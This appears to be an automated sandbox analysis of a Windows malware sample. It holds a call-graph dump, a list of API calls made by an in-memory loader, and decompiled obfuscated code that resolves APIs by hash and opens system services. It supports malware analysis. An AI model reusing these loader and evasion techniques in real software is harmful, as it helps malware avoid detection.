6445->6446 6447 363e60 GetPEB 6446->6447 6447->6443 6448->6056 6452 361c3f 6449->6452 6450 363e60 GetPEB 6450->6455 6451 364e30 GetPEB 6451->6455 6453 363e60 GetPEB 6452->6453 6453->6448 6455->6435 6455->6437 6455->6440 6455->6450 6455->6451 6488 3635c0 6455->6488 6457 36422d 6456->6457 6460 364243 6456->6460 6458 363f00 GetPEB 6457->6458 6459 364237 6458->6459 6461 363e60 GetPEB 6459->6461 6462 363f00 GetPEB 6460->6462 6464 36426b 6460->6464 6461->6460 6463 36425f 6462->6463 6465 363e60 GetPEB 6463->6465 6464->6041 6465->6464 6474 365701 6466->6474 6467 3657e3 6468 365723 6467->6468 6470 363f00 GetPEB 6467->6470 6468->6428 6469 363f00 GetPEB 6469->6474 6471 3657f6 6470->6471 6472 363e60 GetPEB 6471->6472 6472->6468 6473 363e60 GetPEB 6473->6474 6474->6467 6474->6468 6474->6469 6474->6473 6482 3629a0 6475->6482 6476 362abf 6478 362b0c 6476->6478 6479 362ae4 6476->6479 6481 363f00 GetPEB 6476->6481 6477 363f00 GetPEB 6477->6482 6478->6428 6479->6478 6485 363f00 GetPEB 6479->6485 6480 363e60 GetPEB 6480->6482 6483 362ad8 6481->6483 6482->6476 6482->6477 6482->6480 6484 363e60 GetPEB 6483->6484 6484->6479 6486 362b00 6485->6486 6487 363e60 GetPEB 6486->6487 6487->6478 6489 3635e4 6488->6489 6490 363609 6489->6490 6491 363f00 GetPEB 6489->6491 6494 363f00 GetPEB 6490->6494 6497 363631 6490->6497 6492 3635fd 6491->6492 6493 363e60 GetPEB 6492->6493 6493->6490 6495 363625 6494->6495 6496 363e60 GetPEB 6495->6496 6496->6497 6497->6455 6499 365516 6498->6499 6504 36552c 6498->6504 6500 363f00 GetPEB 6499->6500 6501 365520 6500->6501 6502 363e60 GetPEB 6501->6502 6502->6504 6503 365586 6503->6074 6504->6503 6505 363f00 GetPEB 6504->6505 6506 36557a 6505->6506 6507 363e60 GetPEB 6506->6507 6507->6503 6519 36ab66 6508->6519 6509 36ab8c 6509->6091 6512 36ac52 6513 36ac71 6512->6513 6515 363f00 GetPEB 6512->6515 6518 36ac99 6513->6518 6520 363f00 GetPEB 6513->6520 6514 363f00 GetPEB 6514->6519 6516 36ac65 6515->6516 6517 363e60 GetPEB 6516->6517 6517->6513 6518->6091 6519->6509 6519->6512 6519->6514 6521 363e60 GetPEB 6519->6521 6581 364b70 6519->6581 6603 36acd0 6519->6603 6522 36ac8d 6520->6522 6521->6519 6523 363e60 GetPEB 6522->6523 6523->6518 6544 36a189 6524->6544 6525 36acd0 GetPEB 6525->6544 6526 36a552 6528 36a571 6526->6528 6531 363f00 GetPEB 6526->6531 6527 36a439 6527->6091 6537 36a599 6528->6537 6539 363f00 GetPEB 6528->6539 6530 3634c0 GetPEB 6530->6544 6533 36a565 6531->6533 6532 364220 GetPEB 6532->6544 6535 363e60 GetPEB 6533->6535 6534 364b70 2 API calls 6534->6544 6535->6528 6537->6091 6538 363f00 GetPEB 6538->6544 6540 36a58d 6539->6540 6542 363e60 GetPEB 6540->6542 6541 363460 GetPEB 6541->6544 6542->6537 6543 363e60 GetPEB 6543->6544 6544->6525 6544->6526 6544->6527 6544->6530 6544->6532 6544->6534 6544->6538 6544->6541 6544->6543 6613 36b520 6544->6613 6620 361150 6544->6620 6551 36a7c5 6545->6551 6546 36aa19 6546->6091 6547 36acd0 GetPEB 6547->6551 6548 36aacd 6554 363f00 GetPEB 6548->6554 6560 36aaec 6548->6560 6549 36aa7c GetCurrentProcessId 6549->6551 6550 364b70 2 API calls 6550->6551 6551->6546 6551->6547 6551->6548 6551->6549 6551->6550 6556 3642c0 GetPEB 6551->6556 6557 363f00 GetPEB 6551->6557 6563 363e60 GetPEB 6551->6563 6635 3649a0 6551->6635 6645 364850 6551->6645 6555 36aae0 6554->6555 6558 363e60 GetPEB 6555->6558 6556->6551 6557->6551 6558->6560 6559 36ab14 6559->6091 6560->6559 6561 363f00 GetPEB 6560->6561 6562 36ab08 6561->6562 6564 363e60 GetPEB 6562->6564 6563->6551 6564->6559 6566 36a5ef 6565->6566 6567 36a710 6566->6567 6569 363f00 GetPEB 6566->6569 6571 36a731 6566->6571 6573 3642c0 GetPEB 6566->6573 6576 363e60 GetPEB 6566->6576 6654 364370 6566->6654 6567->6091 6569->6566 6570 36a750 6577 36a778 6570->6577 6578 363f00 GetPEB 6570->6578 6571->6570 6572 363f00 GetPEB 6571->6572 6574 36a744 6572->6574 6573->6566 6575 363e60 GetPEB 6574->6575 6575->6570 6576->6566 6577->6091 6579 36a76c 6578->6579 6580 363e60 GetPEB 6579->6580 6580->6577 6582 364b82 6581->6582 6583 364b98 6581->6583 6584 363f00 GetPEB 6582->6584 6587 364bd7 CreateProcessW 6583->6587 6588 363f00 GetPEB 6583->6588 6585 364b8c 6584->6585 6586 363e60 GetPEB 6585->6586 6586->6583 6589 364bf7 6587->6589 6590 364c73 6587->6590 6591 364bc6 6588->6591 6592 364bff 6589->6592 6594 363f00 GetPEB 6589->6594 6599 364c33 6589->6599 6590->6519 6593 363e60 GetPEB 6591->6593 6592->6519 6595 364bd2 6593->6595 6596 364c27 6594->6596 6595->6587 6597 363e60 GetPEB 6596->6597 6597->6599 6598 364c5d 6598->6519 6599->6598 6600 363f00 GetPEB 6599->6600 6601 364c51 6600->6601 6602 363e60 GetPEB 6601->6602 6602->6598 6606 36aced 6603->6606 6604 363f00 GetPEB 6604->6606 6605 3634c0 GetPEB 6605->6606 6606->6604 6606->6605 6607 36af9f 6606->6607 6609 363e60 GetPEB 6606->6609 6611 36af37 6606->6611 6608 363f00 GetPEB 6607->6608 6607->6611 6610 36afb2 6608->6610 6609->6606 6612 363e60 GetPEB 6610->6612 6611->6519 6612->6611 6617 36b536 6613->6617 6614 36b55f 6614->6544 6615 36b633 6629 364fd0 6615->6629 6617->6614 6617->6615 6618 363e60 GetPEB 6617->6618 6619 363f00 GetPEB 6617->6619 6618->6617 6619->6617 6628 361160 6620->6628 6621 36124c 6622 361244 6621->6622 6623 363f00 GetPEB 6621->6623 6622->6544 6624 36125f 6623->6624 6625 363e60 GetPEB 6624->6625 6625->6622 6626 363f00 GetPEB 6626->6628 6627 363e60 GetPEB 6627->6628 6628->6621 6628->6622 6628->6626 6628->6627 6630 364ff9 6629->6630 6634 36500f 6629->6634 6631 363f00 GetPEB 6630->6631 6632 365003 6631->6632 6633 363e60 GetPEB 6632->6633 6633->6634 6634->6614 6644 3649c0 6635->6644 6636 363f00 GetPEB 6636->6644 6637 364b37 6638 3649ea 6637->6638 6639 363f00 GetPEB 6637->6639 6638->6551 6641 364b4a 6639->6641 6640 3634c0 GetPEB 6640->6644 6642 363e60 GetPEB 6641->6642 6642->6638 6643 363e60 GetPEB 6643->6644 6644->6636 6644->6637 6644->6638 6644->6640 6644->6643 6653 364870 6645->6653 6646 36496e 6648 363f00 GetPEB 6646->6648 6649 36492c 6646->6649 6647 363f00 GetPEB 6647->6653 6650 364981 6648->6650 6649->6551 6651 363e60 GetPEB 6650->6651 6651->6649 6652 363e60 GetPEB 6652->6653 6653->6646 6653->6647 6653->6649 6653->6652 6655 364384 6654->6655 6656 36450e 6654->6656 6655->6656 6657 363f00 GetPEB 6655->6657 6660 3643d6 6655->6660 6656->6566 6658 3643ca 6657->6658 6659 363e60 GetPEB 6658->6659 6659->6660 6661 363f00 GetPEB 6660->6661 6667 364436 6660->6667 6673 3644f4 6660->6673 6662 36442a 6661->6662 6664 363e60 GetPEB 6662->6664 6663 3644ba 6674 364550 6663->6674 6664->6667 6665 363f00 GetPEB 6665->6667 6667->6663 6667->6665 6669 363e60 GetPEB 6667->6669 6669->6667 6670 363f00 GetPEB 6671 3644e8 6670->6671 6672 363e60 GetPEB 6671->6672 6672->6673 6673->6566 6675 3644d0 6674->6675 6678 36456b 6674->6678 6675->6670 6675->6673 6676 363e60 GetPEB 6676->6678 6677 363f00 GetPEB 6677->6678 6678->6675 6678->6676 6678->6677 6684 3655c6 6679->6684 6680 363f00 GetPEB 6680->6684 6681 3656a8 6682 3655e8 6681->6682 6683 363f00 GetPEB 6681->6683 6682->6113 6685 3656bb 6683->6685 6684->6680 6684->6681 6684->6682 6686 363e60 GetPEB 6684->6686 6687 363e60 GetPEB 6685->6687 6686->6684 6687->6682 6696 364ca0 6688->6696 6689 363f00 GetPEB 6689->6696 6690 364db4 6691 364d7c 6690->6691 6692 363f00 GetPEB 6690->6692 6691->6113 6693 364dc7 6692->6693 6695 363e60 GetPEB 6693->6695 6694 363e60 GetPEB 6694->6696 6695->6691 6696->6689 6696->6690 6696->6691 6696->6694 6698 3646d7 6697->6698 6703 3646ed 6697->6703 6699 363f00 GetPEB 6698->6699 6700 3646e1 6699->6700 6701 363e60 GetPEB 6700->6701 6701->6703 6702 364760 6702->6122 6703->6702 6704 363f00 GetPEB 6703->6704 6708 364721 6703->6708 6705 364715 6704->6705 6706 363e60 GetPEB 6705->6706 6706->6708 6707 363f00 GetPEB 6709 364746 6707->6709 6708->6707 6710 364752 6708->6710 6711 363e60 GetPEB 6709->6711 6710->6122 6711->6710 6724 3625f0 6712->6724 6713 362912 6715 362937 6713->6715 6716 363f00 GetPEB 6713->6716 6714 362771 6714->6146 6722 36295f 6715->6722 6723 363f00 GetPEB 6715->6723 6719 36292b 6716->6719 6717 3642c0 GetPEB 6717->6724 6718 363f00 GetPEB 6718->6724 6721 363e60 GetPEB 6719->6721 6720 363e60 GetPEB 6720->6724 6721->6715 6722->6146 6725 362953 6723->6725 6724->6713 6724->6714 6724->6717 6724->6718 6724->6720 6726 363e60 GetPEB 6725->6726 6726->6722 6731 361010 6727->6731 6728 361105 6729 36103a 6728->6729 6730 363f00 GetPEB 6728->6730 6729->6172 6732 361118 6730->6732 6731->6728 6731->6729 6733 363e60 GetPEB 6731->6733 6734 363f00 GetPEB 6731->6734 6735 363e60 GetPEB 6732->6735 6733->6731 6734->6731 6735->6729 6737 3634c0 GetPEB 6736->6737 6738 3636c4 6737->6738 6739 3636e5 6738->6739 6740 363f00 GetPEB 6738->6740 6743 363f00 GetPEB 6739->6743 6747 36371a 6739->6747 6741 3636d9 6740->6741 6742 363e60 GetPEB 6741->6742 6742->6739 6744 36370e 6743->6744 6745 363e60 GetPEB 6744->6745 6745->6747 6746 363f00 GetPEB 6748 363736 6746->6748 6747->6746 6749 363742 6747->6749 6750 363e60 GetPEB 6748->6750 6751 36376e 6749->6751 6752 363f00 GetPEB 6749->6752 6750->6749 6751->5947 6753 363762 6752->6753 6754 363e60 GetPEB 6753->6754 6754->6751 6765 367712 6755->6765 6756 3634c0 GetPEB 6756->6765 6757 3677b3 6758 3677d2 6757->6758 6760 363f00 GetPEB 6757->6760 6758->6248 6759 3678a3 6759->6248 6761 3677c6 6760->6761 6762 363e60 GetPEB 6761->6762 6762->6758 6763 363e60 GetPEB 6763->6765 6764 363f00 GetPEB 6764->6765 6765->6756 6765->6757 6765->6759 6765->6763 6765->6764 7111 369b60 7119 369b80 7111->7119 7112 369dd0 GetPEB 7112->7119 7113 369d96 7114 369d12 7113->7114 7115 363f00 GetPEB 7113->7115 7116 369da9 7115->7116 7117 363e60 GetPEB 7116->7117 7117->7114 7118 363f00 GetPEB 7118->7119 7119->7112 7119->7113 7119->7114 7119->7118 7120 363e60 GetPEB 7119->7120 7120->7119 7121 3647e0 7122 364c80 GetPEB 7121->7122 7123 3647f5 7122->7123 6766 2d0170 6767 2d01fb 6766->6767 6782 2d0ad0 6767->6782 6773 2d02c4 6819 2d06f0 6773->6819 6775 2d02d0 6836 2d08f0 6775->6836 6777 2d02dc 6854 2d0580 6777->6854 6779 2d02e8 6780 2d02ef VirtualFree 6779->6780 6781 2d02fb 6779->6781 6780->6781 6783 2d0b2f 6782->6783 6784 2d0bf0 VirtualAlloc 6783->6784 6787 2d02ab 6783->6787 6785 2d0c1c 6784->6785 6786 2d0cdb VirtualAlloc 6785->6786 6785->6787 6786->6787 6788 2d0d60 6787->6788 6789 2d0d94 6788->6789 6790 2d0da3 VirtualAlloc RtlMoveMemory 6789->6790 6791 2d02b8 6790->6791 6797 2d0ddb 6790->6797 6798 2d0400 GetCurrentProcess 6791->6798 6793 2d0e0d RtlMoveMemory 6793->6797 6794 2d0e3c VirtualAlloc 6794->6797 6795 2d0e6a RtlMoveMemory 6795->6791 6795->6797 6796 2d0e91 RtlFillMemory 6796->6791 6796->6797 6797->6791 6797->6794 6797->6795 6797->6796 6862 2d1140 lstrcpynW 6797->6862 6863 2d1140 lstrcpynW 6798->6863 6800 2d0459 NtQueryInformationProcess 6801 2d046f 6800->6801 6802 2d04c5 6800->6802 6803 2d0575 6801->6803 6805 2d0484 GetProcessHeap HeapFree 6801->6805 6806 2d0492 GetProcessHeap RtlAllocateHeap GetCurrentProcess NtQueryInformationProcess 6801->6806 6804 2d04e5 6802->6804 6869 2d1140 lstrcpynW 6802->6869 6864 2d1140 lstrcpynW 6804->6864 6805->6806 6806->6801 6806->6802 6809 2d04dc RtlMoveMemory 6809->6804 6810 2d04ef RtlMoveMemory 6865 2d1140 lstrcpynW 6810->6865 6812 2d0511 RtlMoveMemory 6866 2d1140 lstrcpynW 6812->6866 6814 2d0528 RtlMoveMemory 6867 2d1140 lstrcpynW 6814->6867 6816 2d053f RtlMoveMemory 6868 2d1140 lstrcpynW 6816->6868 6818 2d055a RtlMoveMemory 6818->6773 6820 2d0740 6819->6820 6826 2d0744 6820->6826 6870 2d0fb0 6820->6870 6823 2d07b5 RtlMoveMemory 6824 2d0770 6823->6824 6825 2d07ff LoadLibraryA 6824->6825 6824->6826 6878 2d1140 lstrcpynW 6824->6878 6827 2d08b9 6825->6827 6830 2d080f 6825->6830 6826->6775 6827->6775 6829 2d082d RtlMoveMemory 6829->6824 6829->6830 6830->6824 6830->6826 6831 2d0858 GetProcAddress 6830->6831 6835 2d0890 RtlMoveMemory 6830->6835 6879 2d1140 lstrcpynW 6830->6879 6880 2d1140 lstrcpynW 6830->6880 6831->6826 6831->6830 6833 2d0872 RtlMoveMemory 6881 2d1140 lstrcpynW 6833->6881 6835->6826 6835->6830 6837 2d0934 6836->6837 6838 2d0fb0 2 API calls 6837->6838 6839 2d0938 6837->6839 6840 2d0970 6838->6840 6839->6777 6840->6839 6884 2d1140 lstrcpynW 6840->6884 6842 2d09af RtlMoveMemory 6842->6839 6847 2d09c2 6842->6847 6845 2d09f6 RtlMoveMemory 6845->6847 6846 2d0a97 RtlMoveMemory 6846->6847 6848 2d0aac 6846->6848 6847->6839 6885 2d1140 lstrcpynW 6847->6885 6886 2d1140 lstrcpynW 6847->6886 6888 2d1140 lstrcpynW 6847->6888 6848->6777 6850 2d0a3e RtlMoveMemory 6850->6839 6851 2d0a57 6850->6851 6887 2d1140 lstrcpynW 6851->6887 6853 2d0a61 RtlMoveMemory 6853->6847 6855 2d05bc 6854->6855 6856 2d05c0 6855->6856 6860 2d069b VirtualProtect 6855->6860 6889 2d1140 lstrcpynW 6855->6889 6890 2d1140 lstrcpynW 6855->6890 6856->6779 6858 2d0617 RtlMoveMemory 6858->6855 6860->6855 6861 2d06c6 6860->6861 6861->6779 6862->6793 6863->6800 6864->6810 6865->6812 6866->6814 6867->6816 6868->6818 6869->6809 6872 2d0fda 6870->6872 6871 2d104a 6871->6824 6872->6871 6882 2d1140 lstrcpynW 6872->6882 6874 2d1001 6883 2d1140 lstrcpynW 6874->6883 6876 2d101b RtlMoveMemory 6877 2d1029 6876->6877 6877->6824 6878->6823 6879->6829 6880->6833 6881->6830 6882->6874 6883->6876 6884->6842 6885->6845 6886->6850 6887->6853 6888->6846 6889->6858 6890->6855 6949 361928 6970 36191f 6949->6970 6950 361bc6 6951 3635c0 GetPEB 6950->6951 6953 361bd0 6951->6953 6952 361ba4 6954 361bf1 6953->6954 6955 363f00 GetPEB 6953->6955 6959 361c23 6954->6959 6961 363f00 GetPEB 6954->6961 6957 361be5 6955->6957 6956 363e60 GetPEB 6956->6970 6960 363e60 GetPEB 6957->6960 6958 364e30 GetPEB 6958->6970 6964 361c4b 6959->6964 6965 363f00 GetPEB 6959->6965 6960->6954 6962 361c17 6961->6962 6963 363e60 GetPEB 6962->6963 6963->6959 6966 361c3f 6965->6966 6967 363e60 GetPEB 6966->6967 6967->6964 6968 3635c0 GetPEB 6968->6970 6969 363f00 GetPEB 6969->6970 6970->6950 6970->6952 6970->6956 6970->6958 6970->6968 6970->6969 7130 364869 7133 364870 7130->7133 7131 36496e 7134 363f00 GetPEB 7131->7134 7135 36492c 7131->7135 7132 363f00 GetPEB 7132->7133 7133->7131 7133->7132 7133->7135 7138 363e60 GetPEB 7133->7138 7136 364981 7134->7136 7137 363e60 GetPEB 7136->7137 7137->7135 7138->7133 6971 36b110 6972 36b124 6971->6972 6973 366060 GetPEB 6972->6973 6981 36b1aa 6972->6981 6974 36b136 6973->6974 6975 363310 GetPEB 6974->6975 6976 36b14c 6975->6976 6977 363f00 GetPEB 6976->6977 6980 36b182 6976->6980 6978 36b176 6977->6978 6979 363e60 GetPEB 6978->6979 6979->6980 6980->6981 6982 363f00 GetPEB 6980->6982 6983 36b19e 6982->6983 6984 363e60 GetPEB 6983->6984 6984->6981 6994 36a198 7014 36a189 6994->7014 6995 36acd0 GetPEB 6995->7014 6996 36a439 6997 36a571 7008 36a599 6997->7008 7009 363f00 GetPEB 6997->7009 6998 36a552 6998->6997 7001 363f00 GetPEB 6998->7001 6999 361150 GetPEB 6999->7014 7000 3634c0 GetPEB 7000->7014 7003 36a565 7001->7003 7002 364220 GetPEB 7002->7014 7006 363e60 GetPEB 7003->7006 7004 364b70 2 API calls 7004->7014 7005 363e60 GetPEB 7005->7014 7006->6997 7007 36b520 GetPEB 7007->7014 7010 36a58d 7009->7010 7012 363e60 GetPEB 7010->7012 7011 363460 GetPEB 7011->7014 7012->7008 7013 363f00 GetPEB 7013->7014 7014->6995 7014->6996 7014->6998 7014->6999 7014->7000 7014->7002 7014->7004 7014->7005 7014->7007 7014->7011 7014->7013 7139 361fd8 7146 361fd2 7139->7146 7140 362208 7141 362212 7141->7140 7143 364220 GetPEB 7141->7143 7142 3642c0 GetPEB 7142->7146 7143->7140 7144 363f00 GetPEB 7144->7146 7145 363e60 GetPEB 7145->7146 7146->7140 7146->7141 7146->7142 7146->7144 7146->7145 5845 363780 5846 363795 5845->5846 5847 3637ab 5845->5847 5848 363f00 GetPEB 5846->5848 5850 3637dd 5847->5850 5852 363f00 GetPEB 5847->5852 5849 36379f 5848->5849 5851 363e60 GetPEB 5849->5851 5855 363812 5850->5855 5856 363f00 GetPEB 5850->5856 5851->5847 5853 3637d1 5852->5853 5854 363e60 GetPEB 5853->5854 5854->5850 5858 36384a 5855->5858 5860 363f00 GetPEB 5855->5860 5857 363806 5856->5857 5859 363e60 GetPEB 5857->5859 5863 363f00 GetPEB 5858->5863 5868 363876 5858->5868 5859->5855 5861 36383e 5860->5861 5862 363e60 GetPEB 5861->5862 5862->5858 5864 36386a 5863->5864 5866 363e60 GetPEB 5864->5866 5865 3638d1 SHFileOperationW 5866->5868 5867 363f00 GetPEB 5869 3638c0 5867->5869 5868->5865 5868->5867 5870 363e60 GetPEB 5869->5870 5871 3638cc 5870->5871 5871->5865 7027 362b80 7028 362baf 7027->7028 7029 362b99 7027->7029 7030 363f00 GetPEB 7029->7030 7031 362ba3 7030->7031 7032 363e60 GetPEB 7031->7032 7032->7028 7147 367e40 7155 367e50 7147->7155 7148 367f83 7150 3638f0 2 API calls 7148->7150 7149 367f7a 7151 367f96 7150->7151 7152 3634c0 GetPEB 7152->7155 7153 363f00 GetPEB 7153->7155 7154 363e60 GetPEB 7154->7155 7155->7148 7155->7149 7155->7152 7155->7153 7155->7154 7039 366208 7048 366202 7039->7048 7040 3642c0 GetPEB 7040->7048 7041 3655b0 GetPEB 7041->7048 7042 36624b 7043 364c80 GetPEB 7043->7048 7044 363f00 GetPEB 7044->7048 7045 366490 7046 363e60 GetPEB 7046->7048 7047 363f00 GetPEB 7050 36642d 7047->7050 7048->7040 7048->7041 7048->7042 7048->7043 7048->7044 7048->7046 7048->7050 7049 363e60 GetPEB 7049->7050 7050->7045 7050->7047 7050->7049 7051 366608 7093 3665fd 7051->7093 7052 3694d0 GetPEB 7052->7093 7053 366dcd 7059 36b2e0 GetPEB 7053->7059 7054 367410 GetPEB 7054->7093 7055 368bb0 2 API calls 7055->7093 7056 36706e 7064 368740 3 API calls 7056->7064 7057 369f30 GetPEB 7057->7093 7058 3668df 7059->7058 7060 367061 7072 368d40 2 API calls 7060->7072 7061 3672d0 GetPEB 7061->7093 7062 369050 GetPEB 7062->7093 7063 36b1d0 GetPEB 7063->7093 7074 367073 7064->7074 7065 3680a0 3 API calls 7065->7093 7066 3653d0 GetPEB 7066->7093 7067 366f27 GetTickCount 7067->7093 7068 369270 GetPEB 7068->7093 7069 367120 3 API calls 7069->7093 7070 368700 GetPEB 7070->7093 7071 369860 6 API calls 7071->7093 7080 367066 7072->7080 7073 3661e0 GetPEB 7073->7093 7075 363310 GetPEB 7075->7093 7076 3612b0 2 API calls 7076->7093 7077 36b430 3 API calls 7077->7093 7078 368970 2 API calls 7078->7093 7079 364220 GetPEB 7079->7093 7081 364770 2 API calls 7081->7093 7082 368e80 2 API calls 7082->7093 7083 366060 GetPEB 7083->7093 7084 368400 2 API calls 7084->7093 7085 363e60 GetPEB 7085->7093 7086 361840 GetPEB 7086->7093 7087 369620 2 API calls 7087->7093 7088 366975 GetTickCount 7088->7093 7089 363f00 GetPEB 7089->7093 7090 36afe0 GetPEB 7090->7093 7091 363460 GetPEB 7091->7093 7092 364160 GetPEB 7092->7093 7093->7052 7093->7053 7093->7054 7093->7055 7093->7056 7093->7057 7093->7058 7093->7060 7093->7061 7093->7062 7093->7063 7093->7065 7093->7066 7093->7067 7093->7068 7093->7069 7093->7070 7093->7071 7093->7073 7093->7075 7093->7076 7093->7077 7093->7078 7093->7079 7093->7081 7093->7082 7093->7083 7093->7084 7093->7085 7093->7086 7093->7087 7093->7088 7093->7089 7093->7090 7093->7091 7093->7092

                                                        Executed Functions

                                                        Control-flow Graph

                                                        APIs
                                                        • GetCurrentProcess.KERNEL32(00401010,00000000,?), ref: 002D0448
                                                          • Part of subcall function 002D1140: lstrcpynW.KERNEL32(00000000,00000000,00000000,00000010,002D0EFD,00000000), ref: 002D1155
                                                        • NtQueryInformationProcess.NTDLL(00000000,00000000,00000000,00000018,00401010), ref: 002D0463
                                                        • GetProcessHeap.KERNEL32(?,00401010,00000000,?), ref: 002D0484
                                                        • HeapFree.KERNEL32(00000000,00000001,00000000), ref: 002D048D
                                                        • GetProcessHeap.KERNEL32(?,00401010,00000000,?), ref: 002D0492
                                                        • RtlAllocateHeap.NTDLL(00000000,00000001,00401010), ref: 002D049F
                                                        • GetCurrentProcess.KERNEL32(?,00401010,00000000,?), ref: 002D04A6
                                                        • NtQueryInformationProcess.NTDLL(00000000,00000000,00000000,00401010,00401010), ref: 002D04B9
                                                        • RtlMoveMemory.NTDLL(00000000,00000000,00000018), ref: 002D04E0
                                                        • RtlMoveMemory.NTDLL(00000000,?,00000014), ref: 002D04F7
                                                        • RtlMoveMemory.NTDLL(?,00000000,00000014), ref: 002D0519
                                                        • RtlMoveMemory.NTDLL(00000000,00000000,00000024), ref: 002D0530
                                                        • RtlMoveMemory.NTDLL(00000000,?,00000048), ref: 002D0547
                                                        • RtlMoveMemory.NTDLL(00000000,00000000,00000048), ref: 002D0562
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.2262052090.00000000002D0000.00000040.00000001.sdmp, Offset: 002D0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_2d0000_auditpolmsg.jbxd
                                                        Similarity
                                                        • API ID: MemoryMoveProcess$Heap$CurrentInformationQuery$AllocateFreelstrcpyn
                                                        • String ID:
                                                        • API String ID: 482429597-0
                                                        • Opcode ID: 9b0dd4097f43c0ebb4e34693010eb75d6d5af0ab7a67fa55d809036932efe504
                                                        • Instruction ID: e89fcd0d4599c3d0a2007ea6af4610ccb5c3b28cd23abd02339175211b486740
                                                        • Opcode Fuzzy Hash: 9b0dd4097f43c0ebb4e34693010eb75d6d5af0ab7a67fa55d809036932efe504
                                                        • Instruction Fuzzy Hash: 6A414FB19243417EE710EBA1C846F6BB2EDAB88740F408D1EB64897791D674DD248F62
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 186 368e80-368e98 187 368ea0-368ea5 186->187 188 368f7a-368f7f 187->188 189 368eab 187->189 190 368f85-368f8a 188->190 191 369011-369016 188->191 192 368eb1-368eb6 189->192 193 368f3f-368f46 189->193 196 368fce-368fd5 190->196 197 368f8c-368f91 190->197 191->187 198 368ebc-368ec1 192->198 199 36901b-369022 192->199 194 368f63-368f75 193->194 195 368f48-368f5e call 363f00 call 363e60 193->195 194->187 195->194 201 368fd7-368fed call 363f00 call 363e60 196->201 202 368ff2-36900c OpenServiceW 196->202 205 368f93-368fa3 197->205 206 368fbb-368fc0 197->206 207 368ec3-368ec8 198->207 208 368efc-368f03 198->208 203 369024-36903a call 363f00 call 363e60 199->203 204 36903f 199->204 201->202 202->187 203->204 221 369042-369049 204->221 216 368fa5-368fac 205->216 217 368fae-368fb6 205->217 206->187 209 368fc6-368fcd 206->209 207->206 218 368ece-368ed5 207->218 212 368f05-368f1b call 363f00 call 363e60 208->212 213 368f20-368f2f 208->213 212->213 213->221 233 368f35-368f3a 213->233 216->216 216->217 217->187 219 368ed7-368eed call 363f00 call 363e60 218->219 220 368ef2-368efa 218->220 219->220 220->187 233->187
                                                        C-Code - Quality: 66%
                                                        			E00368E80() {
                                                        				short* _v4;
                                                        				void* __ebx;
                                                        				void* __ecx;
                                                        				void* __ebp;
                                                        				void* _t4;
                                                        				void* _t6;
                                                        				intOrPtr* _t11;
                                                        				intOrPtr* _t15;
                                                        				intOrPtr* _t19;
                                                        				intOrPtr* _t22;
                                                        				void* _t25;
                                                        				void* _t42;
                                                        				short* _t43;
                                                        				intOrPtr _t44;
                                                        				short* _t45;
                                                        				void* _t46;
                                                        				void* _t47;
                                                        
                                                        				_t25 = _v4;
                                                        				_t4 = 0x1779a150;
                                                        				_t46 = _v4;
                                                        				_t43 = _v4;
                                                        				_t42 = 0;
                                                        				goto L1;
                                                        				do {
                                                        					while(1) {
                                                        						L1:
                                                        						_t47 = _t4 - 0xebfcc22;
                                                        						if(_t47 <= 0) {
                                                        							break;
                                                        						}
                                                        						if(_t4 == 0x1779a150) {
                                                        							_t4 = 0x23287775;
                                                        							continue;
                                                        						} else {
                                                        							if(_t4 == 0x1e3d7119) {
                                                        								if( *0x36e270 == 0) {
                                                        									 *0x36e270 = E00363E60(_t25, E00363F00(0x26f5757c), 0x56e230f9, _t46);
                                                        								}
                                                        								_t6 = OpenServiceW(_t46, _t43, 0x10000); // executed
                                                        								_t25 = _t6;
                                                        								_t4 =  !=  ? 0xebfcc22 : 0xbf6010;
                                                        								continue;
                                                        							} else {
                                                        								if(_t4 != 0x23287775) {
                                                        									goto L22;
                                                        								} else {
                                                        									_t44 =  *0x36e54c; // 0x5ce050
                                                        									_t45 = _t44 + 0x260;
                                                        									while( *_t45 != 0x5c) {
                                                        										_t45 = _t45 + 2;
                                                        									}
                                                        									_t43 = _t45 + 2;
                                                        									_t4 = 0x10ada17;
                                                        									continue;
                                                        								}
                                                        							}
                                                        						}
                                                        						L32:
                                                        					}
                                                        					if(_t47 == 0) {
                                                        						_t11 =  *0x36e4c8;
                                                        						if(_t11 == 0) {
                                                        							_t11 = E00363E60(_t25, E00363F00(0x26f5757c), 0xe9d3e51f, _t46);
                                                        							 *0x36e4c8 = _t11;
                                                        						}
                                                        						 *_t11(_t25);
                                                        						_t42 =  !=  ? 1 : _t42;
                                                        						_t4 = 0xd10de09;
                                                        						goto L1;
                                                        					} else {
                                                        						if(_t4 == 0xbf6010) {
                                                        							_t15 =  *0x36e18c;
                                                        							if(_t15 == 0) {
                                                        								_t15 = E00363E60(_t25, E00363F00(0x26f5757c), 0x268fe5f0, _t46);
                                                        								 *0x36e18c = _t15;
                                                        							}
                                                        							 *_t15(_t46);
                                                        							goto L31;
                                                        						} else {
                                                        							if(_t4 == 0x10ada17) {
                                                        								_t19 =  *0x36e310;
                                                        								if(_t19 == 0) {
                                                        									_t19 = E00363E60(_t25, E00363F00(0x26f5757c), 0x9ba7cd1, _t46);
                                                        									 *0x36e310 = _t19;
                                                        								}
                                                        								_t46 =  *_t19(0, 0, 0xf003f);
                                                        								if(_t46 == 0) {
                                                        									L31:
                                                        									return _t42;
                                                        								} else {
                                                        									_t4 = 0x1e3d7119;
                                                        									goto L1;
                                                        								}
                                                        							} else {
                                                        								if(_t4 != 0xd10de09) {
                                                        									goto L22;
                                                        								} else {
                                                        									_t22 =  *0x36e18c;
                                                        									if(_t22 == 0) {
                                                        										_t22 = E00363E60(_t25, E00363F00(0x26f5757c), 0x268fe5f0, _t46);
                                                        										 *0x36e18c = _t22;
                                                        									}
                                                        									 *_t22(_t25);
                                                        									_t4 = 0xbf6010;
                                                        									goto L1;
                                                        								}
                                                        							}
                                                        						}
                                                        					}
                                                        					goto L32;
                                                        					L22:
                                                        				} while (_t4 != 0x2dd4caa9);
                                                        				return _t42;
                                                        				goto L32;
                                                        			}




















                                                        0x00368e82
                                                        0x00368e86
                                                        0x00368e8c
                                                        0x00368e91
                                                        0x00368e96
                                                        0x00368e98
                                                        0x00368ea0
                                                        0x00368ea0
                                                        0x00368ea0
                                                        0x00368ea0
                                                        0x00368ea5
                                                        0x00000000
                                                        0x00000000
                                                        0x00368f7f
